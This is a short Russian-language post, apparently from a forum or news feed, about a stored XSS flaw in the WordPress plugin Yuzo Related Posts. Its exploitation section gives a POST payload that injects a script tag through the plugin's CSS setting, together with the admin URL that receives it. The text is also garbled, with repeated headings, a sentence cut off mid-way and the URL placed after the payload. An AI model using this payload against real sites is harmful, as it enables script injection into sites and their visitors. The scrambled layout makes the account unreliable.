В плагине Yuzo Related Posts, установленном на более чем 60 000 сайтах, некий исследователь безопасности обнаружил уязвимость, которая позволяет хранить stored XSS. Несколько часов назад появились первые сообщения об экспуатации уязвимости.
Суть уязвимости
Эксплуатация:
достаточно послать POST запрос
на
Суть уязвимости
Эксплуатация:
достаточно послать POST запрос
Код:
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
Код:
/wp-admin/options-general.php?page=yuzo-related-post